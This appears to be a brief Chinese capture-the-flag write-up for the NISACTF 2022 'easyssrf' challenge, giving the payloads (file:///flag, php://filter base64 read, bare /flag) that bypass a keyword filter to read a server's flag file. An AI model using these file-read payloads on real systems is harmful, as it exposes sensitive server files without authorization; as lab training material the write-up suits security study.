[NISACTF 2022]easyssrf

它提示我们输入 那我们输入file:///flag file:// 访问本地文件系统

它提醒我们输file:///fl4g

它提醒我们输ha1x1ux1u.php

看到代码stristr($file, "file")当我们输入file它会提示我们输了 啥意思可以前面加个/ 也可以通过read读取 思路都是前面加/不等于flag绕过

file=php://filter/read=convert.base64-encode/resource=/flag 这个需要base64解码

file=php://filter/resource=/flag

file=/flag


相关推荐
剑胆凌锋15 分钟前
等级保护测评工程师的困境
网络·安全·web安全·网络安全·职场和发展
hengdonghui9 小时前
Writeup 4 强网杯 2019 强网先锋打野
ctf·misc·zsteg
小小小小钰儿9 小时前
2.3-云端API集成
人工智能·计算机·网络安全·操作系统·编程
白帽攻防录10 小时前
SRC 挖洞:Dgraph GraphQL 数据库注入深度复盘,CVE-2026-41328 两个请求拖走全库数据
网络安全·graphql
小小小小钰儿12 小时前
2.2-模型微调
人工智能·深度学习·机器学习·计算机·网络安全·操作系统·编程
在猴站学算法13 小时前
(SQL注入学习)联合查询注入(UNION-Based)
sql·学习·网络安全
Seraphina3614 小时前
SQL注入(一)
数据库·经验分享·笔记·sql·网络安全
hengdonghui15 小时前
Writeup 4 NUAA 2017 robots
android·ctf·re
菩提小狗17 小时前
每日安全情报报告 · 2026-10-02
网络安全·漏洞·cve·安全情报·每日安全
白帽攻防录1 天前
SRC 挖洞:Roundcube 预认证 SQL 注入深度复盘,CVE-2026-48842 preg_replace 转义绕过怎么打穿邮件系统
网络·数据库·sql·网络安全·sql注入